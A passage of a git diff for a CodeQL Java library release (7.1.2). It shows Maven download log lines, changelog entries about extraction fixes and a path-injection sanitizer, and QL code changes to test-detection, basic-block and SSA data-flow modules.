https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.5/plexus-utils-1.5.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.6/plexus-utils-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.6/plexus-utils-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.8/plexus-utils-1.5.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.5/plexus-utils-2.0.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.24/plexus-utils-3.0.24.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.24/plexus-utils-3.0.24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.4.1/plexus-utils-3.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.4.1/plexus-utils-3.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/4.0.1/plexus-utils-4.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/4.0.1/plexus-utils-4.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-velocity/1.2/plexus-velocity-1.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-velocity/1.2/plexus-velocity-1.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-xml/3.0.0/plexus-xml-3.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-xml/3.0.0/plexus-xml-3.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.10/plexus-1.0.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.11/plexus-1.0.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.12/plexus-1.0.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.4/plexus-1.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/13/plexus-13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/16/plexus-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/17/plexus-17.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.2/plexus-2.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.5/plexus-2.0.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.6/plexus-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.2/plexus-3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.2/plexus-3.3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/4.0/plexus-4.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/5.1/plexus-5.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/8/plexus-8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit-parent/5.13.0.202109080827-r/org.eclipse.jgit-parent-5.13.0.202109080827-r.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit/5.13.0.202109080827-r/org.eclipse.jgit-5.13.0.202109080827-r.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit/5.13.0.202109080827-r/org.eclipse.jgit-5.13.0.202109080827-r.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-parent/1.3/hamcrest-parent-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.0/junit-bom-5.10.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.1/junit-bom-5.10.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.2/junit-bom-5.10.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.7.2/junit-bom-5.7.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.9.3/junit-bom-5.9.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/9.7/asm-9.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/9.7/asm-9.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/ow2/1.5.1/ow2-1.5.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/ow2/1.5/ow2-1.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.30/slf4j-api-1.7.30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.36/slf4j-api-1.7.36.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.36/slf4j-api-1.7.36.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.5.6/slf4j-parent-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.30/slf4j-parent-1.7.30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.32/slf4j-parent-1.7.32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.36/slf4j-parent-1.7.36.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.5/slf4j-parent-1.7.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-parent/1.7/aether-parent-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/4/forge-parent-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/5/forge-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/6/forge-parent-6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/5/oss-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-bean/1.4.2/guice-bean-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-plexus/1.4.2/guice-plexus-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7-noaop.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject/1.4.2/sisu-inject-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-parent/1.4.2/sisu-parent-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/12/spice-parent-12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/15/spice-parent-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.5/xz-1.5.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.5/xz-1.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.9/xz-1.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.9/xz-1.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/oro/oro/2.0.8/oro-2.0.8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/oro/oro/2.0.8/oro-2.0.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.pom diff --git a/java/ql/integration-tests/java/maven-enforcer/pom.xml b/java/ql/integration-tests/java/maven-enforcer/pom.xml index ca376ad5ba9d..1a1ec409b727 100644 --- a/java/ql/integration-tests/java/maven-enforcer/pom.xml +++ b/java/ql/integration-tests/java/maven-enforcer/pom.xml @@ -77,7 +77,7 @@ - [3.1.1,) + [3.6.3,) diff --git a/java/ql/lib/CHANGELOG.md b/java/ql/lib/CHANGELOG.md index 0bd7926c9565..4e5f40cbc844 100644 --- a/java/ql/lib/CHANGELOG.md +++ b/java/ql/lib/CHANGELOG.md @@ -1,3 +1,18 @@ +## 7.1.2 + +### Minor Analysis Improvements + +* Java extraction is now able to download Maven 3.9.x if a Maven Enforcer Plugin configuration indicates it is necessary. Maven 3.8.x is still preferred if the enforcer-plugin configuration (if any) permits it. +* Added a path injection sanitizer for calls to `java.lang.String.matches`, `java.lang.String.replace`, and `java.lang.String.replaceAll` that make sure '/', '\', '..' are not in the path. + +### Bug Fixes + +* In `build-mode: none` where the project has a Gradle build system, database creation no longer attempts to download some non-existent jar files relating to non-jar Maven artifacts, such as BOMs. This was harmless, but saves some time and reduces spurious warnings. +* Java extraction no longer freezes for a long time or times out when using libraries that feature expanding cyclic generic types. For example, this was known to occur when using some classes from the Blazebit Persistence library. +* Java build-mode `none` no longer fails when a required version of Gradle cannot be downloaded using the `gradle wrapper` command, such as due to a firewall. It will now attempt to use the system version of Gradle if present, or otherwise proceed without detailed dependency information. +* Java build-mode `none` no longer fails when a required version of Maven cannot be downloaded, such as due to a firewall. It will now attempt to use the system version of Maven if present, or otherwise proceed without detailed dependency information. +* Java build-mode `none` now correctly uses Maven dependency information on Windows platforms. + ## 7.1.1 No user-facing changes. diff --git a/java/ql/lib/change-notes/released/7.1.2.md b/java/ql/lib/change-notes/released/7.1.2.md new file mode 100644 index 000000000000..57fc5b2cc6d0 --- /dev/null +++ b/java/ql/lib/change-notes/released/7.1.2.md @@ -0,0 +1,14 @@ +## 7.1.2 + +### Minor Analysis Improvements + +* Java extraction is now able to download Maven 3.9.x if a Maven Enforcer Plugin configuration indicates it is necessary. Maven 3.8.x is still preferred if the enforcer-plugin configuration (if any) permits it. +* Added a path injection sanitizer for calls to `java.lang.String.matches`, `java.lang.String.replace`, and `java.lang.String.replaceAll` that make sure '/', '\', '..' are not in the path. + +### Bug Fixes + +* In `build-mode: none` where the project has a Gradle build system, database creation no longer attempts to download some non-existent jar files relating to non-jar Maven artifacts, such as BOMs. This was harmless, but saves some time and reduces spurious warnings. +* Java extraction no longer freezes for a long time or times out when using libraries that feature expanding cyclic generic types. For example, this was known to occur when using some classes from the Blazebit Persistence library. +* Java build-mode `none` no longer fails when a required version of Gradle cannot be downloaded using the `gradle wrapper` command, such as due to a firewall. It will now attempt to use the system version of Gradle if present, or otherwise proceed without detailed dependency information. +* Java build-mode `none` no longer fails when a required version of Maven cannot be downloaded, such as due to a firewall. It will now attempt to use the system version of Maven if present, or otherwise proceed without detailed dependency information. +* Java build-mode `none` now correctly uses Maven dependency information on Windows platforms. diff --git a/java/ql/lib/codeql-pack.release.yml b/java/ql/lib/codeql-pack.release.yml index 8e970df6cae3..547681cc4408 100644 --- a/java/ql/lib/codeql-pack.release.yml +++ b/java/ql/lib/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 7.1.1 +lastReleaseVersion: 7.1.2 diff --git a/java/ql/lib/qlpack.yml b/java/ql/lib/qlpack.yml index cbc204c8ed1e..51873f7a4706 100644 --- a/java/ql/lib/qlpack.yml +++ b/java/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-all -version: 7.1.1 +version: 7.1.2 groups: java dbscheme: config/semmlecode.dbscheme extractor: java diff --git a/java/ql/lib/semmle/code/java/Expr.qll b/java/ql/lib/semmle/code/java/Expr.qll index cb02791e96cc..e7dd817cecd9 100644 --- a/java/ql/lib/semmle/code/java/Expr.qll +++ b/java/ql/lib/semmle/code/java/Expr.qll @@ -180,7 +180,7 @@ class CompileTimeConstantExpr extends Expr { /** * Gets the string value of this expression, where possible. */ - pragma[nomagic] + cached string getStringValue() { result = this.(StringLiteral).getValue() or @@ -205,7 +205,7 @@ class CompileTimeConstantExpr extends Expr { /** * Gets the boolean value of this expression, where possible. */ - pragma[nomagic] + cached boolean getBooleanValue() { // Literal value. result = this.(BooleanLiteral).getBooleanValue() diff --git a/java/ql/lib/semmle/code/java/JDK.qll b/java/ql/lib/semmle/code/java/JDK.qll index e1fbf9317465..27a8b2a9ca73 100644 --- a/java/ql/lib/semmle/code/java/JDK.qll +++ b/java/ql/lib/semmle/code/java/JDK.qll @@ -45,6 +45,36 @@ class StringContainsMethod extends Method { } } +/** A call to the `java.lang.String.matches` method. */ +class StringMatchesCall extends MethodCall { + StringMatchesCall() { + exists(Method m | m = this.getMethod() | + m.getDeclaringType() instanceof TypeString and + m.hasName("matches") + ) + } +} + +/** A call to the `java.lang.String.replaceAll` method. */ +class StringReplaceAllCall extends MethodCall { + StringReplaceAllCall() { + exists(Method m | m = this.getMethod() | + m.getDeclaringType() instanceof TypeString and + m.hasName("replaceAll") + ) + } +} + +/** A call to the `java.lang.String.replace` method. */ +class StringReplaceCall extends MethodCall { + StringReplaceCall() { + exists(Method m | m = this.getMethod() | + m.getDeclaringType() instanceof TypeString and + m.hasName("replace") + ) + } +} + /** * The methods on the class `java.lang.String` that are used to perform partial matches with a specified substring or char. */ diff --git a/java/ql/lib/semmle/code/java/UnitTests.qll b/java/ql/lib/semmle/code/java/UnitTests.qll index 38f37fa4ff01..d0fb6849f422 100644 --- a/java/ql/lib/semmle/code/java/UnitTests.qll +++ b/java/ql/lib/semmle/code/java/UnitTests.qll @@ -66,6 +66,19 @@ class TestClass extends Class { } } +/** + * A class that is likely a test class. That is either a definite test class, or + * a class whose name, package, or location suggests that it might be a test class. + */ +class LikelyTestClass extends Class { + LikelyTestClass() { + this instanceof TestClass or + this.getName().toLowerCase().matches("%test%") or + this.getPackage().getName().toLowerCase().matches("%test%") or + this.getLocation().getFile().getAbsolutePath().matches("%/src/test/java%") + } +} + /** * A test method declared within a JUnit 3.8 test class. */ @@ -185,6 +198,37 @@ class TestMethod extends Method { } } +/** + * A method that is likely a test method. + */ +class LikelyTestMethod extends Method { + LikelyTestMethod() { + this.getDeclaringType() instanceof LikelyTestClass + or + this instanceof TestMethod + or + this instanceof LikelyJunitTest + } +} + +/** + * A `Method` that is public, has no parameters, + * has a "void" return type, AND either has a name that starts with "test" OR + * has an annotation that ends with "Test" + */ +class LikelyJunitTest extends Method { + LikelyJunitTest() { + this.isPublic() and + this.getReturnType().hasName("void") and + this.hasNoParameters() and + ( + this.getName().matches("JUnit%") or + this.getName().matches("test%") or + this.getAnAnnotation().getType().getName().matches("%Test") + ) + } +} + /** * A TestNG annotation used to mark a method that runs "before". */ diff --git a/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll b/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll index 972f97ba3674..c2f9e8a6a697 100644 --- a/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll +++ b/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll @@ -5,6 +5,19 @@ import java import Dominance +cached +private module BasicBlockStage { + cached + predicate ref() { any() } + + cached + predicate backref() { + (exists(any(BasicBlock bb).getABBSuccessor()) implies any()) and + (exists(any(BasicBlock bb).getNode(_)) implies any()) and + (exists(any(BasicBlock bb).length()) implies any()) + } +} + /** * A control-flow node that represents the start of a basic block. * @@ -12,8 +25,11 @@ import Dominance * often be treated as a unit in analyses. */ class BasicBlock extends ControlFlowNode { + cached BasicBlock() { - not exists(this.getAPredecessor()) and exists(this.getASuccessor()) + BasicBlockStage::ref() and + not exists(this.getAPredecessor()) and + exists(this.getASuccessor()) or strictcount(this.getAPredecessor()) > 1 or @@ -24,7 +40,10 @@ class BasicBlock extends ControlFlowNode { /** Gets an immediate successor of this basic block. */ cached - BasicBlock getABBSuccessor() { result = this.getLastNode().getASuccessor() } + BasicBlock getABBSuccessor() { + BasicBlockStage::ref() and + result = this.getLastNode().getASuccessor() + } /** Gets an immediate predecessor of this basic block. */ BasicBlock getABBPredecessor() { result.getABBSuccessor() = this } @@ -35,7 +54,9 @@ class BasicBlock extends ControlFlowNode { /** Gets the control-flow node at a specific (zero-indexed) position in this basic block. */ cached ControlFlowNode getNode(int pos) { - result = this and pos = 0 + BasicBlockStage::ref() and + result = this and + pos = 0 or exists(ControlFlowNode mid, int mid_pos | pos = mid_pos + 1 | this.getNode(mid_pos) = mid and @@ -52,7 +73,10 @@ class BasicBlock extends ControlFlowNode { /** Gets the number of control-flow nodes contained in this basic block. */ cached - int length() { result = strictcount(this.getANode()) } + int length() { + BasicBlockStage::ref() and + result = strictcount(this.getANode()) + } /** Holds if this basic block strictly dominates `node`. */ predicate bbStrictlyDominates(BasicBlock node) { bbStrictlyDominates(this, node) } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll b/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll index 2c37efea1a46..eeac19e66a74 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll @@ -14,9 +14,26 @@ import java private import codeql.ssa.Ssa as SsaImplCommon +cached +private module BaseSsaStage { + cached + predicate ref() { any() } + + cached + predicate backref() { + (exists(TLocalVar(_, _)) implies any()) and + (exists(any(BaseSsaSourceVariable v).getAnAccess()) implies any()) and + (exists(getAUse(_)) implies any()) + } +} + +cached private newtype TBaseSsaSourceVariable = TLocalVar(Callable c, LocalScopeVariable v) { - c = v.getCallable() or c = v.getAnAccess().getEnclosingCallable() + BaseSsaStage::ref() and + c = v.getCallable() + or + c = v.getAnAccess().getEnclosingCallable() } /** @@ -31,6 +48,7 @@ class BaseSsaSourceVariable extends TBaseSsaSourceVariable { */ cached VarAccess getAnAccess() { + BaseSsaStage::ref() and exists(LocalScopeVariable v, Callable c | this = TLocalVar(c, v) and result = v.getAnAccess() and result.getEnclosingCallable() = c ) @@ -168,12 +186,15 @@ private module SsaInput implements SsaImplCommon::InputSig { * Holds if the `i`th of basic block `bb` reads source variable `v`. */ predicate variableRead(BasicBlock bb, int i, SourceVariable v, boolean certain) { - exists(VarRead use | - v.getAnAccess() = use and bb.getNode(i) = use.getControlFlowNode() and certain = true + hasDominanceInformation(bb) and + ( + exists(VarRead use | + v.getAnAccess() = use and bb.getNode(i) = use.getControlFlowNode() and certain = true + ) + or + variableCapture(v, _, bb, i) and + certain = false ) - or - variableCapture(v, _, bb, i) and - certain = false } } @@ -185,6 +206,7 @@ cached private module Cached { cached VarRead getAUse(Impl::Definition def) { + BaseSsaStage::ref() and exists(BaseSsaSourceVariable v, BasicBlock bb, int i | Impl::ssaDefReachesRead(v, def, bb, i) and result.getControlFlowNode() = bb.getNode(i) and diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowNodes.qll b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowNodes.qll index fd14bcfd100c..7778f6ebc353 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowNodes.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowNodes.qll @@ -26,6 +26,14 @@ private predicate deadcode(Expr e) { module SsaFlow { module Impl = SsaImpl::DataFlowIntegration; + private predicate ssaDefAssigns(SsaExplicitUpdate def, Expr value) { + exists(VariableUpdate upd | upd = def.getDefiningExpr() | + value = upd.(VariableAssign).getSource() or + value = upd.(AssignOp) or + value = upd.(RecordBindingVariableExpr) + ) + } + Impl::Node asNode(Node n) { n = TSsaNode(result) or @@ -33,17 +41,20 @@ module SsaFlow { or result.(Impl::ExprPostUpdateNode).getExpr() = n.(PostUpdateNode).getPreUpdateNode().asExpr() or - TExplicitParameterNode(result.(Impl::ParameterNode).getParameter()) = n + exists(Parameter p | + n = TExplicitParameterNode(p) and + result.(Impl::WriteDefSourceNode).getDefinition().(SsaImplicitInit).isParameterDefinition(p) + ) + or + ssaDefAssigns(result.(Impl::WriteDefSourceNode).getDefinition(), n.asExpr()) } - predicate localFlowStep( - SsaImpl::Impl::DefinitionExt def, Node nodeFrom, Node nodeTo, boolean isUseStep - ) { - Impl::localFlowStep(def, asNode(nodeFrom), asNode(nodeTo), isUseStep) + predicate localFlowStep(SsaSourceVariable v, Node nodeFrom, Node nodeTo, boolean isUseStep) { + Impl::localFlowStep(v, asNode(nodeFrom), asNode(nodeTo), isUseStep) } - predicate localMustFlowStep(SsaImpl::Impl::DefinitionExt def, Node nodeFrom, Node nodeTo) { - Impl::localMustFlowStep(def, asNode(nodeFrom), asNode(nodeTo)) + predicate localMustFlowStep(Node nodeFrom, Node nodeTo) { + Impl::localMustFlowStep(_, asNode(nodeFrom), asNode(nodeTo)) } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll index cc03f227151d..e87c92f3d6c5 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll @@ -168,7 +168,7 @@ predicate localMustFlowStep(Node node1, Node node2) { node2.(ImplicitInstanceAccess).getInstanceAccess().(OwnInstanceAccess).getEnclosingCallable() ) or - SsaFlow::localMustFlowStep(_, node1, node2) + SsaFlow::localMustFlowStep(node1, node2) or node2.asExpr().(CastingExpr).getExpr() = node1.asExpr() or diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/SsaImpl.qll b/java/ql/lib/semmle/code/java/dataflow/internal/SsaImpl.qll index d5fdf4ef829a..b5a42a975699 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/SsaImpl.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/SsaImpl.qll @@ -204,12 +204,15 @@ private module SsaInput implements SsaImplCommon::InputSig { * This includes implicit reads via calls. */ predicate variableRead(BasicBlock bb, int i, SourceVariable v, boolean certain) { - exists(VarRead use | - v.getAnAccess() = use and bb.getNode(i) = use.getControlFlowNode() and certain = true + hasDominanceInformation(bb) and + ( + exists(VarRead use | + v.getAnAccess() = use and bb.getNode(i) = use.getControlFlowNode() and certain = true + ) + or + variableCapture(v, _, bb, i) and + certain = false ) - or - variableCapture(v, _, bb, i) and - certain = false } } @@ -544,15 +547,13 @@ private module Cached { import DataFlowIntegrationImpl cached - predicate localFlowStep(Impl::DefinitionExt def, Node nodeFrom, Node nodeTo, boolean isUseStep) { - not def instanceof UntrackedDef and - DataFlowIntegrationImpl::localFlowStep(def, nodeFrom, nodeTo, isUseStep) + predicate localFlowStep(TrackedVar v, Node nodeFrom, Node nodeTo, boolean isUseStep) { + DataFlowIntegrationImpl::localFlowStep(v, nodeFrom, nodeTo, isUseStep) } cached - predicate localMustFlowStep(Impl::DefinitionExt def, Node nodeFrom, Node nodeTo) { - not def instanceof UntrackedDef and - DataFlowIntegrationImpl::localMustFlowStep(def, nodeFrom, nodeTo) + predicate localMustFlowStep(TrackedVar v, Node nodeFrom, Node nodeTo) { + DataFlowIntegrationImpl::localMustFlowStep(v, nodeFrom, nodeTo) } signature predicate guardChecksSig(Guards::Guard g, Expr e, boolean branch); @@ -646,22 +647,8 @@ private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInpu Expr getARead(Definition def) { result = getAUse(def) } - class Parameter = J::Parameter; - - predicate ssaDefAssigns(Impl::WriteDefinition def, Expr value) { - exists(VariableUpdate upd | upd = def.(SsaExplicitUpdate).getDefiningExpr() | - value = upd.(VariableAssign).getSource() or - value = upd.(AssignOp) or - value = upd.(RecordBindingVariableExpr) - ) - } - - predicate ssaDefInitializesParam(Impl::WriteDefinition def, Parameter p) { - def.(SsaImplicitInit).getSourceVariable() = - any(SsaSourceVariable v | - v.getVariable() = p and - 